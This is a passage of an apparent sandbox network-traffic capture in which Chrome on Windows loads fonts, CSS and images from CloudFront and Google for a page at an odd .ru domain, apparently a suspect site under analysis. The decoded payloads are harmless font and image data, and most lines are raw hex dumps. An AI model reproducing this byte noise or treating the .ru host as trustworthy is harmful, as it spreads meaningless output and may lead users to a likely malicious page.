ZicpIGZvcm1hdCgnd29mZicpLHVybCgnaHR0cHM6Ly9kMWM4amZwdThxMHEyay5jbG91ZGZyb250Lm5ldC9zdGF0aWNzL2Nyb3BwZWQvanMvZm9udHMvU2lsa2EtUm9tYW4tV2ViZm9udC9zaWxrYS1zZW1pYm9sZC13ZWJmb250LnR0ZicpIGZvcm1hdCgndHJ1ZXR5cGUnKTtmb250LXdlaWdodDo2MDA7Zm9udC1zdHlsZTpub3JtYWw7fQp
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 32 5a 76 62 6e 52 7a 4c 31 4e 70 62 47 74 68 4c 56 4a 76 62 57 46 75 4c 56 64 6c 59 6d 5a 76 62 6e 51 76 63 32 6c 73 61 32 45 74 63 6d 56 6e 64 57 78 68 63 69 31 33 5a 57 4a 6d 62 32 35 30 4c 6d 56 76 64 43 63 70 4f 33 4e 79 59 7a 70 31 63 6d 77 6f 4a 32 68 30 64 48 42 7a 4f 69 38 76 5a 44 46 6a 4f 47 70 6d 63 48 55 34 63 54 42 78 4d 6d 73 75 59 32 78 76 64 57 52 6d 63 6d 39 75 64 43 35 75 5a 58 51 76 63 33 52 68 64 47 6c 6a 63 79 39 6a 63 6d 39 77 63 47 56 6b 4c 32 70 7a 4c 32 5a 76 62 6e 52 7a 4c 31 4e 70 62 47 74 68 4c 56 4a 76 62 57 46 75 4c 56 64 6c 59 6d 5a 76 62 6e 51 76 63 32 6c 73 61 32 45 74 63 6d 56 6e 64 57 78 68 63 69 31 33 5a 57 4a 6d 62 32 35 30 4c 6d 56 76 64 44 38 6a 61 57 56 6d 61 58 67 6e 4b 53 42 6d 62 33 4a 74 59 58 51 6f 4a 32 56 74 Data Ascii: 2ZvbnRzL1NpbGthLVJvbWFuLVdlYmZvbnQvc2lsa2EtcmVndWxhci13ZWJmb250LmVvdCcpO3NyYzp1cmwoJ2h0dHBzOi8vZDFjOGpmcHU4cTBxMmsuY2xvdWRmcm9udC5uZXQvc3RhdGljcy9jcm9wcGVkL2pzL2ZvbnRzL1NpbGthLVJvbWFuLVdlYmZvbnQvc2lsa2EtcmVndWxhci13ZWJmb250LmVvdD8jaWVmaXgnKSBmb3JtYXQoJ2Vt
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 42 56 4b 30 45 33 4d 6a 41 74 51 54 64 47 52 6a 74 39 43 6b 42 6d 62 32 35 30 4c 57 5a 68 59 32 56 37 5a 6d 39 75 64 43 31 6d 59 57 31 70 62 48 6b 36 4a 31 42 76 63 48 42 70 62 6e 4d 6e 4f 32 5a 76 62 6e 51 74 63 33 52 35 62 47 55 36 62 6d 39 79 62 57 46 73 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 45 77 4d 44 74 6d 62 32 35 30 4c 57 52 70 63 33 42 73 59 58 6b 36 63 33 64 68 63 44 74 7a 63 6d 4d 36 64 58 4a 73 4b 47 68 30 64 48 42 7a 4f 69 38 76 5a 6d 39 75 64 48 4d 75 5a 33 4e 30 59 58 52 70 59 79 35 6a 62 32 30 76 63 79 39 77 62 33 42 77 61 57 35 7a 4c 33 59 79 4d 69 39 77 65 47 6c 48 65 58 41 34 61 33 59 34 53 6b 68 6e 52 6c 5a 79 54 46 42 55 64 57 4e 49 64 45 45 75 64 32 39 6d 5a 6a 49 70 49 47 5a 76 63 6d 31 68 64 43 67 6e 64 32 39 6d 5a Data Ascii: BVK0E3MjAtQTdGRjt9CkBmb250LWZhY2V7Zm9udC1mYW1pbHk6J1BvcHBpbnMnO2ZvbnQtc3R5bGU6bm9ybWFsO2ZvbnQtd2VpZ2h0OjEwMDtmb250LWRpc3BsYXk6c3dhcDtzcmM6dXJsKGh0dHBzOi8vZm9udHMuZ3N0YXRpYy5jb20vcy9wb3BwaW5zL3YyMi9weGlHeXA4a3Y4SkhnRlZyTFBUdWNIdEEud29mZjIpIGZvcm1hdCgnd29mZ
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 44 4e 69 77 67 56 53 73 77 4d 6b 52 42 4c 43 42 56 4b 7a 41 79 52 45 4d 73 49 46 55 72 4d 44 4d 77 4e 43 77 67 56 53 73 77 4d 7a 41 34 4c 43 42 56 4b 7a 41 7a 4d 6a 6b 73 49 46 55 72 4d 6a 41 77 4d 43 30 79 4d 44 5a 47 4c 43 42 56 4b 7a 49 77 51 55 4d 73 49 46 55 72 4d 6a 45 79 4d 69 77 67 56 53 73 79 4d 54 6b 78 4c 43 42 56 4b 7a 49 78 4f 54 4d 73 49 46 55 72 4d 6a 49 78 4d 69 77 67 56 53 73 79 4d 6a 45 31 4c 43 42 56 4b 30 5a 46 52 6b 59 73 49 46 55 72 52 6b 5a 47 52 44 74 39 43 6b 42 6d 62 32 35 30 4c 57 5a 68 59 32 56 37 5a 6d 39 75 64 43 31 6d 59 57 31 70 62 48 6b 36 4a 31 42 76 63 48 42 70 62 6e 4d 6e 4f 32 5a 76 62 6e 51 74 63 33 52 35 62 47 55 36 62 6d 39 79 62 57 46 73 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 4d 77 4d 44 74 6d 62 32 Data Ascii: DNiwgVSswMkRBLCBVKzAyREMsIFUrMDMwNCwgVSswMzA4LCBVKzAzMjksIFUrMjAwMC0yMDZGLCBVKzIwQUMsIFUrMjEyMiwgVSsyMTkxLCBVKzIxOTMsIFUrMjIxMiwgVSsyMjE1LCBVK0ZFRkYsIFUrRkZGRDt9CkBmb250LWZhY2V7Zm9udC1mYW1pbHk6J1BvcHBpbnMnO2ZvbnQtc3R5bGU6bm9ybWFsO2ZvbnQtd2VpZ2h0OjMwMDtmb2
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 4f 47 74 32 4f 45 70 49 5a 30 5a 57 63 6b 70 4b 62 6d 56 6a 62 55 35 46 4c 6e 64 76 5a 6d 59 79 4b 53 42 6d 62 33 4a 74 59 58 51 6f 4a 33 64 76 5a 6d 59 79 4a 79 6b 37 64 57 35 70 59 32 39 6b 5a 53 31 79 59 57 35 6e 5a 54 70 56 4b 7a 41 78 4d 44 41 74 4d 44 4a 43 51 53 77 67 56 53 73 77 4d 6b 4a 45 4c 54 41 79 51 7a 55 73 49 46 55 72 4d 44 4a 44 4e 79 30 77 4d 6b 4e 44 4c 43 42 56 4b 7a 41 79 51 30 55 74 4d 44 4a 45 4e 79 77 67 56 53 73 77 4d 6b 52 45 4c 54 41 79 52 6b 59 73 49 46 55 72 4d 44 4d 77 4e 43 77 67 56 53 73 77 4d 7a 41 34 4c 43 42 56 4b 7a 41 7a 4d 6a 6b 73 49 46 55 72 4d 55 51 77 4d 43 30 78 52 45 4a 47 4c 43 42 56 4b 7a 46 46 4d 44 41 74 4d 55 55 35 52 69 77 67 56 53 73 78 52 55 59 79 4c 54 46 46 52 6b 59 73 49 46 55 72 4d 6a 41 79 4d 43 77 Data Ascii: OGt2OEpIZ0ZWckpKbmVjbU5FLndvZmYyKSBmb3JtYXQoJ3dvZmYyJyk7dW5pY29kZS1yYW5nZTpVKzAxMDAtMDJCQSwgVSswMkJELTAyQzUsIFUrMDJDNy0wMkNDLCBVKzAyQ0UtMDJENywgVSswMkRELTAyRkYsIFUrMDMwNCwgVSswMzA4LCBVKzAzMjksIFUrMUQwMC0xREJGLCBVKzFFMDAtMUU5RiwgVSsxRUYyLTFFRkYsIFUrMjAyMCw
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 6d 39 75 64 43 31 6d 59 57 31 70 62 48 6b 36 4a 31 42 76 63 48 42 70 62 6e 4d 6e 4f 32 5a 76 62 6e 51 74 63 33 52 35 62 47 55 36 62 6d 39 79 62 57 46 73 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 6d 62 32 35 30 4c 57 52 70 63 33 42 73 59 58 6b 36 63 33 64 68 63 44 74 7a 63 6d 4d 36 64 58 4a 73 4b 47 68 30 64 48 42 7a 4f 69 38 76 5a 6d 39 75 64 48 4d 75 5a 33 4e 30 59 58 52 70 59 79 35 6a 62 32 30 76 63 79 39 77 62 33 42 77 61 57 35 7a 4c 33 59 79 4d 69 39 77 65 47 6c 43 65 58 41 34 61 33 59 34 53 6b 68 6e 52 6c 5a 79 54 45 64 55 4f 56 6f 78 65 47 78 47 55 53 35 33 62 32 5a 6d 4d 69 6b 67 5a 6d 39 79 62 57 46 30 4b 43 64 33 62 32 5a 6d 4d 69 63 70 4f 33 56 75 61 57 4e 76 5a 47 55 74 63 6d 46 75 5a 32 55 36 56 53 73 77 4d 44 41 77 Data Ascii: m9udC1mYW1pbHk6J1BvcHBpbnMnO2ZvbnQtc3R5bGU6bm9ybWFsO2ZvbnQtd2VpZ2h0OjUwMDtmb250LWRpc3BsYXk6c3dhcDtzcmM6dXJsKGh0dHBzOi8vZm9udHMuZ3N0YXRpYy5jb20vcy9wb3BwaW5zL3YyMi9weGlCeXA4a3Y4SkhnRlZyTEdUOVoxeGxGUS53b2ZmMikgZm9ybWF0KCd3b2ZmMicpO3VuaWNvZGUtcmFuZ2U6VSswMDAw
2025-04-15 16:49:48 UTC	1369	IN	Data Raw: 41 30 4c 43 42 56 4b 7a 41 7a 4d 44 67 73 49 46 55 72 4d 44 4d 79 4f 53 77 67 56 53 73 79 4d 44 41 77 4c 54 49 77 4e 6b 59 73 49 46 55 72 4d 6a 42 42 51 79 77 67 56 53 73 79 4d 54 49 79 4c 43 42 56 4b 7a 49 78 4f 54 45 73 49 46 55 72 4d 6a 45 35 4d 79 77 67 56 53 73 79 4d 6a 45 79 4c 43 42 56 4b 7a 49 79 4d 54 55 73 49 46 55 72 52 6b 56 47 52 69 77 67 56 53 74 47 52 6b 5a 45 4f 33 30 4b 51 47 5a 76 62 6e 51 74 5a 6d 46 6a 5a 58 74 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 6f 6e 55 47 39 77 63 47 6c 75 63 79 63 37 5a 6d 39 75 64 43 31 7a 64 48 6c 73 5a 54 70 75 62 33 4a 74 59 57 77 37 5a 6d 39 75 64 43 31 33 5a 57 6c 6e 61 48 51 36 4e 7a 41 77 4f 32 5a 76 62 6e 51 74 5a 47 6c 7a 63 47 78 68 65 54 70 7a 64 32 46 77 4f 33 4e 79 59 7a 70 31 63 6d 77 6f 61 Data Ascii: A0LCBVKzAzMDgsIFUrMDMyOSwgVSsyMDAwLTIwNkYsIFUrMjBBQywgVSsyMTIyLCBVKzIxOTEsIFUrMjE5MywgVSsyMjEyLCBVKzIyMTUsIFUrRkVGRiwgVStGRkZEO30KQGZvbnQtZmFjZXtmb250LWZhbWlseTonUG9wcGlucyc7Zm9udC1zdHlsZTpub3JtYWw7Zm9udC13ZWlnaHQ6NzAwO2ZvbnQtZGlzcGxheTpzd2FwO3NyYzp1cmwoa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	3.165.184.23	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:49:49 UTC	638	OUT	GET /statics/cropped/js/fonts/Silka-Roman-Webfont/silka-semibold-webfont.woff2 HTTP/1.1 Host: d1c8jfpu8q0q2k.cloudfront.net Connection: keep-alive Origin: https://8rv.ngenerstr.ru sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://8rv.ngenerstr.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:49:49 UTC	655	IN	HTTP/1.1 200 OK Content-Type: binary/octet-stream Content-Length: 28072 Connection: close Date: Tue, 15 Apr 2025 16:49:50 GMT Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, POST, DELETE, PUT Access-Control-Max-Age: 3000 Last-Modified: Mon, 20 Sep 2021 12:20:12 GMT ETag: "56f7292614c26375c4cb455dda8a7a8f" Accept-Ranges: bytes Server: AmazonS3 Vary: Origin,Access-Control-Request-Headers,Access-Control-Request-Method X-Cache: Miss from cloudfront Via: 1.1 84e419a51f782fd7cbb72b0518440a8a.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ATL59-P9 X-Amz-Cf-Id: v4fElydlHvD56wj8Fv9l-hye5bYdBzKFAq8a8D8NM4Nww8KBlrJ5sw==
2025-04-15 16:49:49 UTC	15729	IN	Data Raw: 77 4f 46 32 00 01 00 00 00 00 6d a8 00 13 00 00 00 01 3d ac 00 00 6d 3a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 4e 1b c4 6e 1c 84 70 06 60 00 87 26 08 36 09 84 65 11 08 0a 83 f5 4c 83 bd 3b 01 36 02 24 03 8b 6c 0b 85 78 00 04 20 05 86 16 07 8f 5d 0c 82 45 3f 77 65 62 66 06 5b 4f 1d 71 81 6d d3 a9 99 dd 0e 58 f6 fe 76 fb 57 8c 8d 91 d9 bb 6d 50 b2 ee cf 1c 3d a9 40 6e 9e 2c 77 ab 22 8b 18 6e 2a fb ff ff 94 a4 63 0c 07 d4 06 a9 5a 55 3f e8 50 99 75 18 a5 c9 56 e8 a3 63 2e 93 48 9c 66 25 56 e1 c2 cc a2 11 ae 44 4b af f2 7e 9c 97 fe 30 74 c8 cd 2b d0 4c 3f 09 b9 a7 e4 2d 6e fe 19 a2 93 f6 7e f8 9a a9 d8 57 90 4f 3e e0 44 1a 85 2b fe 8b 13 63 27 ad c7 3f 2c c5 96 9f 34 72 18 fe b0 2e 47 86 90 4b 26 3a 6e d0 Data Ascii: wOF2m=m:?FFTMNnp`&6eL;6$lx ]E?webf[OqmXvWmP=@n,w"n*cZU?PuVc.Hf%VDK~0t+L?-n~WO>D+c'?,4r.GK&:n
2025-04-15 16:49:49 UTC	261	IN	Data Raw: 00 7e 3e 0a 4c d6 a3 0b 4f 4d da 86 a4 63 bb f6 6e fd ae 79 f2 51 e0 97 d0 cc 4c 40 58 9b dd 63 49 7c 0f 7b 21 95 e9 c9 fb 2a 17 2d 38 fa 19 08 50 71 66 66 1a 1f 17 d8 3d 22 90 67 4b 70 09 fe 08 3c 5a 90 ec b9 77 3f 95 76 58 60 17 b0 2d 12 d3 26 0f 30 8c e3 22 45 16 03 2c 15 3e e0 f5 c3 eb 5a a5 bc 0f 91 94 ba 68 33 74 0b 79 b4 b5 c0 9c 77 53 0f 05 84 fc 2c 1b 62 25 9b b5 f7 e8 74 8b ae ad 37 61 43 c0 66 88 66 91 b1 94 08 25 65 e9 7a 66 59 96 df a4 ff bc 0c 4e f8 d0 43 0c 77 f9 1f 71 af a4 55 66 8e a4 d7 2a ca 1b 3e 23 d6 00 66 d0 f6 a9 4d 09 b6 5f 22 c3 b7 1b ef 6b ce fe 77 47 28 3c 21 80 a9 08 38 34 0f 14 71 3a 75 65 33 a3 f4 a1 21 ae 85 7f 01 0b 0b 37 5e a6 c2 36 b5 be 10 d5 07 76 bd 39 26 f4 4c 13 ed 80 49 df 73 16 bd a7 c8 7c 5f d8 56 72 fe 7a 71 39 Data Ascii: ~>LOMcnyQL@XcI\|{!-8Pqff="gKp<Zw?vX`-&0"E,>Zh3tywS,b%t7aCff%ezfYNCwqUf>#fM_"kwG(<!84q:ue3!7^6v9&LIs\|_Vrzq9
2025-04-15 16:49:49 UTC	1397	IN	Data Raw: 39 e1 aa f8 83 f2 bd be 6f be 6a bf 68 5f 9a f9 2d c1 a1 ff c1 c2 12 d3 83 03 1f 2a d7 06 08 e3 f0 02 03 52 79 21 b0 e7 72 e2 73 7e fd 1a 3c 55 85 f4 0f 87 c2 9b f5 40 bc df ae 1f 42 08 12 39 99 27 08 b3 10 74 1e 09 30 4b c7 f1 db d4 36 67 25 40 0d 23 9a 74 30 5a 4a e8 1a 1b 14 aa d4 a2 51 36 e0 cb e3 53 09 50 d4 07 ce 94 88 a8 43 f9 84 7b bc eb 9d 73 02 cd 59 a4 b2 32 41 2b 95 74 10 a6 91 02 64 12 49 83 aa ab 15 41 c2 0a 89 42 d1 d6 8b 40 a4 b4 75 bb d7 82 2d 02 3b 0f 79 c2 09 e4 e1 5b 45 2b 70 77 ef 74 e3 59 a0 d9 aa e5 e6 4e e9 98 25 d1 e7 e7 21 d8 3f 00 64 2e 75 49 fb 76 3e 11 fd 9c 5d 49 21 3a b0 6e 97 4c b0 81 6b fd 80 b6 49 2b ef d1 f8 b4 fe 0e c9 12 2c 64 94 3c 72 06 ab 6d 4c f7 25 81 2a 20 f5 dd 0e dd 96 e0 66 f3 e5 c5 df df 32 c1 74 f3 e1 de eb Data Ascii: 9ojh_-Ry!rs~<U@B9't0K6g%@#t0ZJQ6SPC{sY2A+tdIAB@u-;y[E+pwtYN%!?d.uIv>]I!:nLkI+,d<rmL% f2t
2025-04-15 16:49:49 UTC	10685	IN	Data Raw: b0 ad 3c 3b 68 3a 3b 2d bb c6 81 29 c1 e6 a9 6a 87 91 c9 9a 1d e2 f8 3f 96 2c 95 e4 ae 65 74 31 1c c4 12 03 9e f8 ac 60 ce 78 90 96 06 e7 87 95 d9 66 c2 da 7b 53 a6 d5 b9 ad 90 aa 6a 7b 6c ec 37 d9 38 ba 25 51 54 d8 0f 80 fa 44 52 a5 32 05 49 4b ad d8 d1 54 ac 2b 18 51 73 80 34 5b 91 56 a9 c3 16 26 dd 90 a0 58 9d 40 ea 59 a2 38 b2 05 02 06 57 49 f8 21 be 4b 6a 4b f5 c2 99 44 18 9c c0 0d e1 a9 64 84 34 a1 30 fb 86 70 db 41 6a 6d 72 9c 3b 98 ac 8a c9 0c 9b 4c 01 64 87 d6 d3 23 c2 8a 83 be 95 59 0b 24 27 f2 4f 45 54 77 05 95 5f b0 42 80 bf 16 30 cb 60 94 c0 9c 23 a4 d1 0d 96 c7 c7 71 8a ab 22 c6 51 81 68 50 7c 5e 03 40 c0 36 fe a3 00 3b 1b a2 53 5a d9 24 71 e9 88 0d 84 c2 ab 08 6f 69 d8 b9 a9 6d 6b f1 0a da 60 7b 37 91 97 2c 27 ca f4 64 88 8a 40 2a a5 c8 f4 Data Ascii: <;h:;-)j?,et1`xf{Sj{l78%QTDR2IKT+Qs4[V&X@Y8WI!KjKDd40pAjmr;Ld#Y$'OETw_B0`#q"QhP\|^@6;SZ$qoimk`{7,'d@*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	3.165.184.23	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:49:49 UTC	667	OUT	GET /statics/cropped/js/img/robot-illy.png HTTP/1.1 Host: d1c8jfpu8q0q2k.cloudfront.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://8rv.ngenerstr.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:49:49 UTC	447	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 1684 Connection: close Date: Tue, 15 Apr 2025 16:49:50 GMT Last-Modified: Thu, 23 Sep 2021 14:03:05 GMT ETag: "37279ebd8719e5675eb9874d16043443" Accept-Ranges: bytes Server: AmazonS3 X-Cache: Miss from cloudfront Via: 1.1 aa1e76533c762b7eceb0771ab89ea584.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ATL59-P9 X-Amz-Cf-Id: rxTUTCdwzrvuzCL9eSSe1QfaOh6q5dN4r1TrtRZawUFtpgz8P62HcQ==
2025-04-15 16:49:49 UTC	1684	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 33 00 00 00 39 08 06 00 00 00 9b 3a 13 4c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 29 49 44 41 54 78 01 dd 5a cd 56 db 46 14 be 33 b2 1d e7 74 a3 26 b1 a1 ab 88 13 1c 44 36 71 9e a0 e2 09 30 bb ec 62 9e 00 d8 75 07 3c 01 c9 13 c4 7d 82 d0 65 57 76 96 5d c5 6c 12 73 a0 45 59 35 27 a4 89 b3 49 c0 92 e6 f6 de b1 a1 86 da 41 12 23 e7 c0 77 0e 58 96 47 a3 b9 ba 7f df bd 23 80 6b 04 01 13 c4 83 4a a9 1a a1 58 d7 37 0e e5 5a c7 7f e7 83 41 4c 4c 18 d7 9d 76 44 a4 5e f1 31 0a e8 22 a2 7d 1c 04 33 be df ed 82 21 48 98 10 44 a0 aa 08 60 87 80 0b a0 d4 b2 00 61 17 ad fc 22 18 44 0e 26 84 50 a2 Data Ascii: PNGIHDR39:LpHYssRGBgAMAa)IDATxZVF3t&D6q0bu<}eWv]lsEY5'IA#wXG#kJX7ZALLvD^1"}3!HD`a"D&P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	3.165.184.23	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:49:50 UTC	430	OUT	GET /statics/cropped/js/img/robot-illy.png HTTP/1.1 Host: d1c8jfpu8q0q2k.cloudfront.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:49:50 UTC	454	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 1684 Connection: close Date: Tue, 15 Apr 2025 16:49:50 GMT Last-Modified: Thu, 23 Sep 2021 14:03:05 GMT ETag: "37279ebd8719e5675eb9874d16043443" Accept-Ranges: bytes Server: AmazonS3 X-Cache: Hit from cloudfront Via: 1.1 5c526e69ed5dfdb2673e47af81eb433c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ATL59-P9 X-Amz-Cf-Id: G2cucZBdgJhw51zcTEmxbsaR8RD7MXVmX-LBhVqsSe3kXbLfDpRSWQ== Age: 1
2025-04-15 16:49:50 UTC	1684	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 33 00 00 00 39 08 06 00 00 00 9b 3a 13 4c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 29 49 44 41 54 78 01 dd 5a cd 56 db 46 14 be 33 b2 1d e7 74 a3 26 b1 a1 ab 88 13 1c 44 36 71 9e a0 e2 09 30 bb ec 62 9e 00 d8 75 07 3c 01 c9 13 c4 7d 82 d0 65 57 76 96 5d c5 6c 12 73 a0 45 59 35 27 a4 89 b3 49 c0 92 e6 f6 de b1 a1 86 da 41 12 23 e7 c0 77 0e 58 96 47 a3 b9 ba 7f df bd 23 80 6b 04 01 13 c4 83 4a a9 1a a1 58 d7 37 0e e5 5a c7 7f e7 83 41 4c 4c 18 d7 9d 76 44 a4 5e f1 31 0a e8 22 a2 7d 1c 04 33 be df ed 82 21 48 98 10 44 a0 aa 08 60 87 80 0b a0 d4 b2 00 61 17 ad fc 22 18 44 0e 26 84 50 a2 Data Ascii: PNGIHDR39:LpHYssRGBgAMAa)IDATxZVF3t&D6q0bu<}eWv]lsEY5'IA#wXG#kJX7ZALLvD^1"}3!HD`a"D&P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	108.177.122.105	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-15 16:49:50 UTC	787	OUT	GET /images/icons/product/cloud_storage-32.png HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJWhywEInP7MAQiFoM0BCL7VzgEIgdbOAQjB2M4BCMjczgEIiuDOAQiu5M4BCIvlzgE= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://storage.googleapis.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-15 16:49:50 UTC	670	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 850 Date: Tue, 15 Apr 2025 16:49:50 GMT Expires: Tue, 15 Apr 2025 16:49:50 GMT Cache-Control: private, max-age=31536000 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-04-15 16:49:50 UTC	654	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 03 19 49 44 41 54 58 c3 cd 97 dd 6b d3 50 18 c6 83 37 ea ed 10 ff 84 dd 28 c8 c6 50 44 71 fd 48 ba 75 0c 3b 2f 74 75 30 61 e8 86 55 71 8c 31 d0 75 28 36 4d 5a 6d ad ab db 98 ba 2f 86 4c c1 4b 91 81 8c 81 57 fb 0f 44 f6 65 bb 8f 8b b9 2d 5d d6 36 6d d3 26 3d 9e d3 b4 83 b0 b6 49 fa 01 3b f0 a3 17 c9 fb 3c 4f 72 4e 7a de 83 61 27 7d 00 00 ce 76 4f a5 1b 1e ce 88 9a e8 9e 12 1b 50 6d 59 e6 d6 51 b1 cf 40 0b 40 4f 8b 25 22 00 eb 98 38 a0 d9 78 e0 ab 88 3d fd 2c 5e 44 02 46 57 79 20 8d 27 b3 42 5d d7 84 a8 2d 44 8b 57 f8 63 74 a5 40 25 30 7b 84 15 4d e6 1d 63 a9 bb 7a 2a 09 8c 74 65 30 40 2d eb 48 ea 9e a2 31 9f 02 99 5f 93 2b 19 c3 61 61 25 21 5c 49 1e 69 Data Ascii: PNGIHDR szzIDATXkP7(PDqHu;/tu0aUq1u(6MZm/LKWDe-]6m&=I;<OrNza'}vOPmYQ@@O%"8x=,^DFWy 'B]-DWct@%0{Mcz*te0@-H1_+aa%!\Ii
2025-04-15 16:49:50 UTC	196	IN	Data Raw: ad 26 80 3c 84 3a 5a 9d 41 4f d1 6e 28 29 48 ed 52 13 c5 70 26 27 03 94 20 10 e4 1e 14 5f 03 7a 88 ae 00 e8 9a 61 68 3d 81 b4 63 7c 5a b9 29 ed 1c 65 ad e8 e9 4c 4e 75 10 e4 2e 34 59 cd 18 e5 a3 71 70 15 b4 7b 82 9d 9a 3a e3 56 17 f3 db 84 42 a8 84 70 fc 03 7a 68 94 8f a6 17 6b cb 9a cc 9f cd 85 b1 be 59 f6 02 ee d8 83 e2 ea 91 42 ac c8 68 7c be 02 1e 8f 6f 5e ea 9b d8 d6 7e 34 eb f0 87 7a 09 18 02 77 ec aa e7 d5 0e 34 5d ce a0 83 dc 71 07 fa cb 3d 9c 9e ee f9 10 aa b3 7d 52 4f cf f8 4e 7d 97 3f 50 0f 6b cf 9c f8 d3 f7 7f 4c 43 26 8f bb 11 b4 30 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: &<:ZAOn()HRp&' _zah=c\|Z)eLNu.4Yqp{:VBpzhkYBh\|o^~4zw4]q=}RON}?PkLC&0IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49738	108.177.122.103	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
